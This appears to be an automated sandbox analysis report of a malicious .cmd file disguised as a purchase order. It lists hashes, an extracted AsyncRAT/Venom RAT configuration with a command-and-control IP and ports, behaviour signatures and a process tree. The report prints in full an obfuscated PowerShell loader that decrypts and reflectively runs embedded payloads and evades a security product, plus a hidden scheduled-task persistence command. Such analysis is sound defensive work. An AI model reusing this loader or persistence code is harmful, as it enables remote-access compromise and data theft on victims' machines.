Analysis
-
max time kernel
134s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2024 12:03
Static task
static1
Behavioral task
behavioral1
Sample
New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd
Resource
win7-20240729-en
General
-
Target
New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd
-
Size
67KB
-
MD5
25927e296d192c57b87be2b7c08b9217
-
SHA1
a87d3ee507f615fbdd785beab75834de6ca8278a
-
SHA256
ac9a63cffda7c69820207e8f51ed0a0d24f77d5f81600ccd56406790ca6f5c83
-
SHA512
4c3606a2868f2ea0ddbc4a450614ccbd3f6a8bd649e6a797e8dbcab2e679bdbf2024f6722012431f9687109670a98e9b2e7d878e30fa0372a3531bf2ea3bbd97
-
SSDEEP
1536:tXUTAKUXpetG7GvuGSERPZSnw22B1Tkn0v:tETvUXpI/GuH2BM
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.2
READYGO
154.216.18.40:4449
154.216.18.40:6184
127.0.0.1:4449
127.0.0.1:6184
jbrtziyfzmhjgtm
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/2812-105-0x0000027B547E0000-0x0000027B547F8000-memory.dmp family_asyncrat -
Blocklisted process makes network request 5 IoCs
flow pid Process 24 2812 powershell.exe 30 2812 powershell.exe 34 2812 powershell.exe 37 2812 powershell.exe 39 2812 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 1652 powershell.exe 1464 powershell.exe 736 powershell.exe 512 powershell.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 3808 powershell.exe 3808 powershell.exe 1652 powershell.exe 1652 powershell.exe 3544 powershell.exe 3544 powershell.exe 1464 powershell.exe 1464 powershell.exe 2812 powershell.exe 2812 powershell.exe 736 powershell.exe 736 powershell.exe 1204 powershell.exe 1204 powershell.exe 512 powershell.exe 512 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeIncreaseQuotaPrivilege 3544 powershell.exe Token: SeSecurityPrivilege 3544 powershell.exe Token: SeTakeOwnershipPrivilege 3544 powershell.exe Token: SeLoadDriverPrivilege 3544 powershell.exe Token: SeSystemProfilePrivilege 3544 powershell.exe Token: SeSystemtimePrivilege 3544 powershell.exe Token: SeProfSingleProcessPrivilege 3544 powershell.exe Token: SeIncBasePriorityPrivilege 3544 powershell.exe Token: SeCreatePagefilePrivilege 3544 powershell.exe Token: SeBackupPrivilege 3544 powershell.exe Token: SeRestorePrivilege 3544 powershell.exe Token: SeShutdownPrivilege 3544 powershell.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeSystemEnvironmentPrivilege 3544 powershell.exe Token: SeRemoteShutdownPrivilege 3544 powershell.exe Token: SeUndockPrivilege 3544 powershell.exe Token: SeManageVolumePrivilege 3544 powershell.exe Token: 33 3544 powershell.exe Token: 34 3544 powershell.exe Token: 35 3544 powershell.exe Token: 36 3544 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeIncreaseQuotaPrivilege 1464 powershell.exe Token: SeSecurityPrivilege 1464 powershell.exe Token: SeTakeOwnershipPrivilege 1464 powershell.exe Token: SeLoadDriverPrivilege 1464 powershell.exe Token: SeSystemProfilePrivilege 1464 powershell.exe Token: SeSystemtimePrivilege 1464 powershell.exe Token: SeProfSingleProcessPrivilege 1464 powershell.exe Token: SeIncBasePriorityPrivilege 1464 powershell.exe Token: SeCreatePagefilePrivilege 1464 powershell.exe Token: SeBackupPrivilege 1464 powershell.exe Token: SeRestorePrivilege 1464 powershell.exe Token: SeShutdownPrivilege 1464 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeSystemEnvironmentPrivilege 1464 powershell.exe Token: SeRemoteShutdownPrivilege 1464 powershell.exe Token: SeUndockPrivilege 1464 powershell.exe Token: SeManageVolumePrivilege 1464 powershell.exe Token: 33 1464 powershell.exe Token: 34 1464 powershell.exe Token: 35 1464 powershell.exe Token: 36 1464 powershell.exe Token: SeIncreaseQuotaPrivilege 1464 powershell.exe Token: SeSecurityPrivilege 1464 powershell.exe Token: SeTakeOwnershipPrivilege 1464 powershell.exe Token: SeLoadDriverPrivilege 1464 powershell.exe Token: SeSystemProfilePrivilege 1464 powershell.exe Token: SeSystemtimePrivilege 1464 powershell.exe Token: SeProfSingleProcessPrivilege 1464 powershell.exe Token: SeIncBasePriorityPrivilege 1464 powershell.exe Token: SeCreatePagefilePrivilege 1464 powershell.exe Token: SeBackupPrivilege 1464 powershell.exe Token: SeRestorePrivilege 1464 powershell.exe Token: SeShutdownPrivilege 1464 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeSystemEnvironmentPrivilege 1464 powershell.exe Token: SeRemoteShutdownPrivilege 1464 powershell.exe Token: SeUndockPrivilege 1464 powershell.exe Token: SeManageVolumePrivilege 1464 powershell.exe Token: 33 1464 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2812 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3152 wrote to memory of 3872 3152 cmd.exe 87 PID 3152 wrote to memory of 3872 3152 cmd.exe 87 PID 3152 wrote to memory of 3808 3152 cmd.exe 88 PID 3152 wrote to memory of 3808 3152 cmd.exe 88 PID 3808 wrote to memory of 1652 3808 powershell.exe 92 PID 3808 wrote to memory of 1652 3808 powershell.exe 92 PID 3808 wrote to memory of 3544 3808 powershell.exe 94 PID 3808 wrote to memory of 3544 3808 powershell.exe 94 PID 3808 wrote to memory of 1464 3808 powershell.exe 97 PID 3808 wrote to memory of 1464 3808 powershell.exe 97 PID 3808 wrote to memory of 4028 3808 powershell.exe 99 PID 3808 wrote to memory of 4028 3808 powershell.exe 99 PID 4028 wrote to memory of 2372 4028 cmd.exe 101 PID 4028 wrote to memory of 2372 4028 cmd.exe 101 PID 2372 wrote to memory of 4552 2372 cmd.exe 103 PID 2372 wrote to memory of 4552 2372 cmd.exe 103 PID 2372 wrote to memory of 2812 2372 cmd.exe 104 PID 2372 wrote to memory of 2812 2372 cmd.exe 104 PID 2812 wrote to memory of 736 2812 powershell.exe 105 PID 2812 wrote to memory of 736 2812 powershell.exe 105 PID 2812 wrote to memory of 1204 2812 powershell.exe 106 PID 2812 wrote to memory of 1204 2812 powershell.exe 106 PID 2812 wrote to memory of 512 2812 powershell.exe 108 PID 2812 wrote to memory of 512 2812 powershell.exe 108
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd';$fqwe='ReaABYRdLABYRinABYResABYR'.Replace('ABYR', ''),'Snkxapnkxalitnkxa'.Replace('nkxa', ''),'EleokkrmeokkrntAokkrtokkr'.Replace('okkr', ''),'EECoHntECoHrECoHyPoECoHiECoHnECoHtECoH'.Replace('ECoH', ''),'GtwLSettwLSCutwLSrtwLSretwLSntwLSttwLSPrtwLSocetwLSsstwLS'.Replace('twLS', ''),'TVMDwrVMDwaVMDwnsVMDwforVMDwmFiVMDwnaVMDwlBlVMDwocVMDwkVMDw'.Replace('VMDw', ''),'IpWzDnvpWzDopWzDkpWzDepWzD'.Replace('pWzD', ''),'FrJxKhomBJxKhaJxKhseJxKh64SJxKhtJxKhriJxKhnJxKhgJxKh'.Replace('JxKh', ''),'Loiohfadiohf'.Replace('iohf', ''),'DeZgWdcoZgWdmpZgWdrZgWdeZgWdsZgWdsZgWd'.Replace('ZgWd', ''),'ChautuynutuygeEutuyxutuyteutuynsiutuyoutuynutuy'.Replace('utuy', ''),'MaMBRyiMBRynMMBRyoduMBRyleMBRy'.Replace('MBRy', ''),'CraUNKeaaUNKtaUNKeDaUNKecaUNKraUNKypaUNKtoaUNKraUNK'.Replace('aUNK', ''),'CXDFCoXDFCpXDFCyToXDFC'.Replace('XDFC', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($fqwe[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function RyEJM($bZGlf){$dAgOT=[System.Security.Cryptography.Aes]::Create();$dAgOT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dAgOT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dAgOT.Key=[System.Convert]::($fqwe[7])('hgNXz1fD3vm3S5F/rkSDGMdYKv7gk2P2ZQChO5e/6Co=');$dAgOT.IV=[System.Convert]::($fqwe[7])('Md9mUVXJ/X1tjxSRFOzmPA==');$lxUOE=$dAgOT.($fqwe[12])();$vusSA=$lxUOE.($fqwe[5])($bZGlf,0,$bZGlf.Length);$lxUOE.Dispose();$dAgOT.Dispose();$vusSA;}function cACUf($bZGlf){$rDMwq=New-Object System.IO.MemoryStream(,$bZGlf);$HiJuv=New-Object System.IO.MemoryStream;$Iropi=New-Object System.IO.Compression.GZipStream($rDMwq,[IO.Compression.CompressionMode]::($fqwe[9]));$Iropi.($fqwe[13])($HiJuv);$Iropi.Dispose();$rDMwq.Dispose();$HiJuv.Dispose();$HiJuv.ToArray();}$KEDOk=[System.IO.File]::($fqwe[0])([Console]::Title);$FSBau=cACUf (RyEJM ([Convert]::($fqwe[7])([System.Linq.Enumerable]::($fqwe[2])($KEDOk, 5).Substring(2))));$AbKCR=cACUf (RyEJM ([Convert]::($fqwe[7])([System.Linq.Enumerable]::($fqwe[2])($KEDOk, 6).Substring(2))));[System.Reflection.Assembly]::($fqwe[8])([byte[]]$AbKCR).($fqwe[3]).($fqwe[6])($null,$null);[System.Reflection.Assembly]::($fqwe[8])([byte[]]$FSBau).($fqwe[3]).($fqwe[6])($null,$null); "2⤵PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\New-Order#2819_381918_391733_3793_399173_509463_57165_509725')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 39497' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network39497Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network39497Man.cmd"3⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network39497Man.cmd"4⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network39497Man.cmd';$fqwe='ReaABYRdLABYRinABYResABYR'.Replace('ABYR', ''),'Snkxapnkxalitnkxa'.Replace('nkxa', ''),'EleokkrmeokkrntAokkrtokkr'.Replace('okkr', ''),'EECoHntECoHrECoHyPoECoHiECoHnECoHtECoH'.Replace('ECoH', ''),'GtwLSettwLSCutwLSrtwLSretwLSntwLSttwLSPrtwLSocetwLSsstwLS'.Replace('twLS', ''),'TVMDwrVMDwaVMDwnsVMDwforVMDwmFiVMDwnaVMDwlBlVMDwocVMDwkVMDw'.Replace('VMDw', ''),'IpWzDnvpWzDopWzDkpWzDepWzD'.Replace('pWzD', ''),'FrJxKhomBJxKhaJxKhseJxKh64SJxKhtJxKhriJxKhnJxKhgJxKh'.Replace('JxKh', ''),'Loiohfadiohf'.Replace('iohf', ''),'DeZgWdcoZgWdmpZgWdrZgWdeZgWdsZgWdsZgWd'.Replace('ZgWd', ''),'ChautuynutuygeEutuyxutuyteutuynsiutuyoutuynutuy'.Replace('utuy', ''),'MaMBRyiMBRynMMBRyoduMBRyleMBRy'.Replace('MBRy', ''),'CraUNKeaaUNKtaUNKeDaUNKecaUNKraUNKypaUNKtoaUNKraUNK'.Replace('aUNK', ''),'CXDFCoXDFCpXDFCyToXDFC'.Replace('XDFC', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($fqwe[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function RyEJM($bZGlf){$dAgOT=[System.Security.Cryptography.Aes]::Create();$dAgOT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dAgOT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dAgOT.Key=[System.Convert]::($fqwe[7])('hgNXz1fD3vm3S5F/rkSDGMdYKv7gk2P2ZQChO5e/6Co=');$dAgOT.IV=[System.Convert]::($fqwe[7])('Md9mUVXJ/X1tjxSRFOzmPA==');$lxUOE=$dAgOT.($fqwe[12])();$vusSA=$lxUOE.($fqwe[5])($bZGlf,0,$bZGlf.Length);$lxUOE.Dispose();$dAgOT.Dispose();$vusSA;}function cACUf($bZGlf){$rDMwq=New-Object System.IO.MemoryStream(,$bZGlf);$HiJuv=New-Object System.IO.MemoryStream;$Iropi=New-Object System.IO.Compression.GZipStream($rDMwq,[IO.Compression.CompressionMode]::($fqwe[9]));$Iropi.($fqwe[13])($HiJuv);$Iropi.Dispose();$rDMwq.Dispose();$HiJuv.Dispose();$HiJuv.ToArray();}$KEDOk=[System.IO.File]::($fqwe[0])([Console]::Title);$FSBau=cACUf (RyEJM ([Convert]::($fqwe[7])([System.Linq.Enumerable]::($fqwe[2])($KEDOk, 5).Substring(2))));$AbKCR=cACUf (RyEJM ([Convert]::($fqwe[7])([System.Linq.Enumerable]::($fqwe[2])($KEDOk, 6).Substring(2))));[System.Reflection.Assembly]::($fqwe[8])([byte[]]$AbKCR).($fqwe[3]).($fqwe[6])($null,$null);[System.Reflection.Assembly]::($fqwe[8])([byte[]]$FSBau).($fqwe[3]).($fqwe[6])($null,$null); "5⤵PID:4552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network39497Man')6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 39497' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network39497Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:512
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
2KB
MD5e4de99c1795fd54aa87da05fa39c199c
SHA1dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
SHA25623c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
SHA512796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926
-
Filesize
1KB
MD59d662ecae338ca923a784422a86e9925
SHA1ccdbbd6f3a1801b13f503d92f5d48fe5041ab495
SHA256af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e
SHA5125455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e
-
Filesize
1KB
MD509df1c8860a50dee2f3ceecef5124364
SHA1c83ddbfcbb776cc528efc452eb9591a7a4242712
SHA256af667bae2b877027a613c89c3580a7716347aa67fd5160744e711369e6194bfa
SHA512c62bd34031ca6dd5029b729b17e67166498fa4f1cf2ec009e5a6ac43e24824a96e1bd2955e942c6c42fdc48c007c0fefab23e5413bb388fa054b8787ac334d2c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
67KB
MD525927e296d192c57b87be2b7c08b9217
SHA1a87d3ee507f615fbdd785beab75834de6ca8278a
SHA256ac9a63cffda7c69820207e8f51ed0a0d24f77d5f81600ccd56406790ca6f5c83
SHA5124c3606a2868f2ea0ddbc4a450614ccbd3f6a8bd649e6a797e8dbcab2e679bdbf2024f6722012431f9687109670a98e9b2e7d878e30fa0372a3531bf2ea3bbd97